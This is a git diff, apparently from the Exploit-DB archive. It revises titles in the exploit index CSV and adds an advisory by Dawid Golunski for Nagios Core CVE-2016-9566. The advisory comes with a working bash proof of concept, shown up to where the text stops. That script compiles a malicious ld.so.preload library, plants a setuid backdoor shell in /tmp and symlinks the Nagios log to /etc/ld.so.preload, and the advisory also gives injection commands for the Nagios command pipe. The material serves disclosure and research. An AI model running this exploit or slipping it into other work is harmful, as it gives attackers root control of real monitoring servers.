@ -23989,7 +23994,7 @@ id,file,description,date,author,platform,type,port
15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0
15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection",2010-10-08,ZoRLu,asp,webapps,0
15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0
15222,platforms/php/webapps/15222.txt,"Joomla! Component 'com_cbe' - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
15222,platforms/php/webapps/15222.txt,"Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0
15224,platforms/php/webapps/15224.txt,"Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
@ -24351,7 +24356,7 @@ id,file,description,date,author,platform,type,port
16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0
16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0
16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
16010,platforms/php/webapps/16010.txt,"Joomla! Component 'com_allcinevid' 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
16010,platforms/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - Unserialize()",2011-01-18,felix,php,webapps,0
16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,php,webapps,0
17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0
@ -25017,7 +25022,7 @@ id,file,description,date,author,platform,type,port
18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0
18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0
18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0
18058,platforms/php/webapps/18058.txt,"Joomla! Component 'com_alameda' 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0
18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0
18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) SQL Injection",2011-11-02,LiquidWorm,php,webapps,0
@ -26305,7 +26310,7 @@ id,file,description,date,author,platform,type,port
23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0
23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0
23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0
23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id Parameter) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0
23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' Parameter SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0
23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem Parameter' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0
23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0
23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0
@ -26729,10 +26734,10 @@ id,file,description,date,author,platform,type,port
24061,platforms/php/webapps/24061.txt,"OpenBB 1.0.x - Private Message Disclosure",2004-04-26,"Manuel Lopez",php,webapps,0
24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",php,webapps,0
24071,platforms/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",php,webapps,0
24072,platforms/php/webapps/24072.txt,"Coppermine Photo Gallery 1.x - menu.inc.php CPG_URL Parameter Cross-Site Scripting",2004-04-30,"Janek Vind",php,webapps,0
24073,platforms/php/webapps/24073.txt,"Coppermine Photo Gallery 1.x - modules.php startdir Parameter Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps,0
24074,platforms/php/webapps/24074.txt,"Coppermine Photo Gallery 1.x - init.inc.php Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.x - theme.php Multiple Parameter Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24072,platforms/php/webapps/24072.txt,"Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting",2004-04-30,"Janek Vind",php,webapps,0
24073,platforms/php/webapps/24073.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Parameter Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps,0
24074,platforms/php/webapps/24074.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0
24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - AddUser.cfm Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0
24082,platforms/php/webapps/24082.txt,"Simple Machines Forum (SMF) 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0
24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0
@ -27533,7 +27538,7 @@ id,file,description,date,author,platform,type,port
25542,platforms/asp/webapps/25542.txt,"MetaCart2 - strSubCatalog_NAME Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
25543,platforms/asp/webapps/25543.txt,"MetaCart2 - SearchAction.asp Multiple SQL Injection",2005-04-26,Dcrab,asp,webapps,0
25544,platforms/asp/webapps/25544.txt,"MetaBid Auctions - intAuctionID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - PostID Parameter SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0
25545,platforms/php/webapps/25545.txt,"BBlog 0.7.4 - 'PostID' Parameter SQL Injection",2004-04-26,jericho+bblog@attrition.org,php,webapps,0
25548,platforms/php/webapps/25548.txt,"PHPCart - Input Validation",2005-04-27,Lostmon,php,webapps,0
25549,platforms/php/webapps/25549.txt,"Claroline 1.5/1.6 - toolaccess_details.php tool Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0
25550,platforms/php/webapps/25550.txt,"Claroline 1.5/1.6 - user_access_details.php data Parameter Cross-Site Scripting",2005-04-27,"Sieg Fried",php,webapps,0
@ -30405,7 +30410,7 @@ id,file,description,date,author,platform,type,port
29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 - mkpw_mp.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0
29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - mkpw.pl plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0
29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - mkpw.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0
29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.x - Albmgr.php SQL Injection",2007-01-05,DarkFig,php,webapps,0
29397,platforms/php/webapps/29397.php,"Coppermine Photo Gallery 1.4.11 - SQL Injection",2007-01-05,DarkFig,php,webapps,0
29398,platforms/asp/webapps/29398.txt,"Shopstorenow E-Commerce Shopping Cart - Orange.asp SQL Injection",2007-01-06,IbnuSina,asp,webapps,0
29401,platforms/asp/webapps/29401.txt,"CreateAuction - Cats.asp SQL Injection",2007-01-08,IbnuSina,asp,webapps,0
29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - AJAX index.php Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0
@ -30592,10 +30597,10 @@ id,file,description,date,author,platform,type,port
29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Persistent Cross-Site Scripting",2013-11-16,"Ali Raza",ios,webapps,0
29634,platforms/php/webapps/29634.txt,"Plantilla - list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 - edit.php Directory Traversal",2007-02-22,"laurent gaffie",php,webapps,0
29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 - install/index.php step Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0
29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - install/index.php step Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'index.php' load Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'index.php' id Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0
29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 - 'step' Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0
29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0
29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Parameter Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps,0
29640,platforms/php/webapps/29640.txt,"Shop Kit Plus - StyleCSS.php Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0
29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps,0
29642,platforms/php/webapps/29642.txt,"Simple one-file Gallery - gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0
@ -31149,8 +31154,8 @@ id,file,description,date,author,platform,type,port
30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface admin/restartMessage.shtml server Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0
30588,platforms/php/webapps/30588.txt,"ewire Payment Client 1.60/1.70 - Command Execution",2007-09-17,anonymous,php,webapps,0
30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0
30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.x - mode.php referer Parameter Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0
30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.x - viewlog.php log Parameter Local File Inclusion",2007-09-17,L4teral,php,webapps,0
30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Parameter Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0
30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Parameter Local File Inclusion",2007-09-17,L4teral,php,webapps,0
30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - hilfe.php Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0
30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - RC Parameter Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0
30598,platforms/cgi/webapps/30598.txt,"WebBatch - webbatch.exe URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0
@ -31549,7 +31554,7 @@ id,file,description,date,author,platform,type,port
31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0
31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0
31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0
@ -31788,7 +31793,7 @@ id,file,description,date,author,platform,type,port
31588,platforms/php/webapps/31588.txt,"EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
31589,platforms/php/webapps/31589.txt,"EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b - Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0
31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component 'com_lms' - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0
31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0
31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0
31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php' lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0
31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - sess.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0
@ -32508,8 +32513,8 @@ id,file,description,date,author,platform,type,port
32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' Parameter SQL Injection",2009-01-15,Pouya_Server,php,webapps,0
32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0
32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0
32735,platforms/asp/webapps/32735.txt,"Blog Manager - inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0
32736,platforms/asp/webapps/32736.txt,"Blog Manager - inc_webblogmanager.asp categoryId Parameter Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0
32735,platforms/asp/webapps/32735.txt,"Blog Manager - 'ItemID' Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0
32736,platforms/asp/webapps/32736.txt,"Blog Manager - 'categoryId' Parameter Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0
32741,platforms/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - search.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0
32742,platforms/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - swr.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0
32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0
@ -32770,7 +32775,7 @@ id,file,description,date,author,platform,type,port
33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0
33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Persistent Cross-Site Scripting",2014-05-08,"Deepak Rathore",php,webapps,0
33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x < 2.6.x - Local File Inclusion",2014-05-08,"Dolev Farhi",php,webapps,0
33256,platforms/php/webapps/33256.txt,"e107 0.7.x - (CAPTCHA Security Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-09-28,MustLive,php,webapps,0
33256,platforms/php/webapps/33256.txt,"e107 0.7.x - CAPTCHA Security Bypass / Cross-Site Scripting",2009-09-28,MustLive,php,webapps,0
33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Parameter Directory Traversal",2009-09-29,"Infected Web",php,webapps,0
33266,platforms/php/webapps/33266.txt,"Joomla! Component CB Resume Builder - 'group_id' Parameter SQL Injection",2009-10-05,kaMtiEz,php,webapps,0
33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps,0
@ -33297,7 +33302,7 @@ id,file,description,date,author,platform,type,port
34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080
34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 - (data.php) Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80
34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
34250,platforms/php/webapps/34250.txt,"Joomla! Component 'com_canteen' 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
34250,platforms/php/webapps/34250.txt,"Joomla! Component Canteen 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps,0
34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0
34254,platforms/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",hardware,webapps,0
@ -33890,8 +33895,8 @@ id,file,description,date,author,platform,type,port
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - help.php Multiple Parameter Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - searchnew.php picfile_* Parameter Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 - 'help.php' Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - 'searchnew.php' Cross-Site Scripting",2010-12-28,waraxe,php,webapps,0
35159,platforms/php/webapps/35159.txt,"MODx CMS 2.2.14 - Cross-Site Request Forgery Bypass / Reflected Cross-Site Scripting / Persistent Cross-Site Scripting",2014-11-05,"Narendra Bhati",php,webapps,0
35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - Persistent Cross-Site Scripting",2014-11-05,"Halil Dalabasmaz",php,webapps,0
35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 - 'getURL.php' SQL Injection",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0

Can't render this file because it is too large.

495
platforms/linux/local/40921.py Executable file
View file

@ -0,0 +1,495 @@
'''
Source: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-9566
- Release date: 15.12.2016
- Revision 1.0
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Nagios Core < 4.2.4 - Root Privilege Escalation
II. BACKGROUND
-------------------------
"Nagios Is The Industry Standard In IT Infrastructure Monitoring
Achieve instant awareness of IT infrastructure problems, so downtime doesn't
adversely affect your business.
Nagios offers complete monitoring and alerting for servers, switches,
applications, and services."
https://www.nagios.org/
III. INTRODUCTION
-------------------------
Nagios Core daemon in versions below 4.2.4 was found to perform unsafe
operations when handling the log file. This could be exploited by
malicious local attackers to escalate their privileges from 'nagios' system user,
or from a user belonging to 'nagios' group, to root.
The exploit could enable the attackers to fully compromise the system on which a
vulnerable Nagios version was installed.
To obtain the necessary level of access, the attackers could use another
Nagios vulnerability discovered by the author of this advisory - CVE-2016-9565
which has been linked in the references.
IV. DESCRIPTION
-------------------------
Default installation of Nagios Core creates the log directory with the
following permissions:
drwxrwsr-x 5 nagios nagios
Nagios daemon was found to open the log file before dropping its root
privileges on startup:
8148 open("/usr/local/nagios/var/nagios.log",
O_RDWR|O_CREAT|O_APPEND, 0666) = 4
8148 fcntl(4, F_SETFD, FD_CLOEXEC) = 0
8148 fchown(4, 1001, 1001) = 0
8148 getegid() = 0
8148 setgid(1001) = 0
8148 geteuid() = 0
[...]
If an attacker managed to gain access to an account of 'nagios' or any
other account belonging to the 'nagios' group, they would be able to
replace the log file with a symlink to an arbitrary file on the system.
This vulnerability could be used by an attacker to escalate their privileges
from nagios user/group to root for example by creating a malicious
/etc/ld.so.preload file.
The file would be created with the following nagios permissions due to
the fchown operation shown above:
-rw-r--r-- 1 nagios nagios 950 Dec 10 11:56 /etc/ld.so.preload
which would enable write access to the file for the 'nagios' user
but not the 'nagios' group.
Gaining write access to ld.so.preload as 'nagios' group
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If the attacker managed to exploit the CVE-2016-9565 vulnerability explained at:
https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
https://www.exploit-db.com/exploits/40920
they would gain access to www-data account belonging to 'nagios' group in case
of a default Nagios install following the official Nagios setup guide:
https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf
This would not be enough to write to ld.so.preload file as 'nagios' group is
only allowed to read the log file.
Attackers with access to 'nagios' group could however bypass the lack of
write privilege by writing to Nagios external command pipe (nagios.cmd) which
is writable by 'nagios' group by default:
prw-rw---- 1 nagios nagios 0 Dec 10 19:39 nagios.cmd
The Nagios command pipe allows to communicate with Nagios daemon.
By sending an invalid command to the pipe, the attacker could bypass the lack
of write permission and inject data to the log file (pointing to ld.so.preload).
For example, by running the command:
/usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so \n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd
Nagios daemon would append the following line to the log file:
[1481439996] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so
which would be enough to load a malicious library and escalate the privileges
from a www-data user (belonging to 'nagios' group) to root upon a Nagios restart.
Forcing restart of Nagios daemon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Attackers could speed up the restart by using the Nagios command pipe once again
to send a SHUTDOWN_PROGRAM command as follows:
/usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd
V. PROOF OF CONCEPT EXPLOIT
-------------------------
-----------[ nagios-root-privesc.sh ]--------------
'''
#!/bin/bash
#
# Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit
# nagios-root-privesc.sh (ver. 1.0)
#
# CVE-2016-9566
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory
#
#
# [Info]
#
# This PoC exploit allows privilege escalation from 'nagios' system account,
# or an account belonging to 'nagios' group, to root (root shell).
# Attackers could obtain such an account via exploiting another vulnerability,
# e.g. CVE-2016-9565 linked below.
#
# [Exploit usage]
#
# ./nagios-root-privesc.sh path_to_nagios.log
#
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
#
# Video PoC:
# https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
#
# CVE-2016-9565:
# https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nagiosrootsh"
PRIVESCLIB="/tmp/nagios_privesc_lib.so"
PRIVESCSRC="/tmp/nagios_privesc_lib.c"
SUIDBIN="/usr/bin/sudo"
commandfile='/usr/local/nagios/var/rw/nagios.cmd'
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $ERRORLOG
touch $ERRORLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Ctrl+C pressed"
cleanexit 0
}
#intro
echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"
# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q nagios
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f "$ERRORLOG" ]; then
echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"
echo -e "./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log\n"
exit 3
fi
# [ Exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi
# Symlink the Nagios log file
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
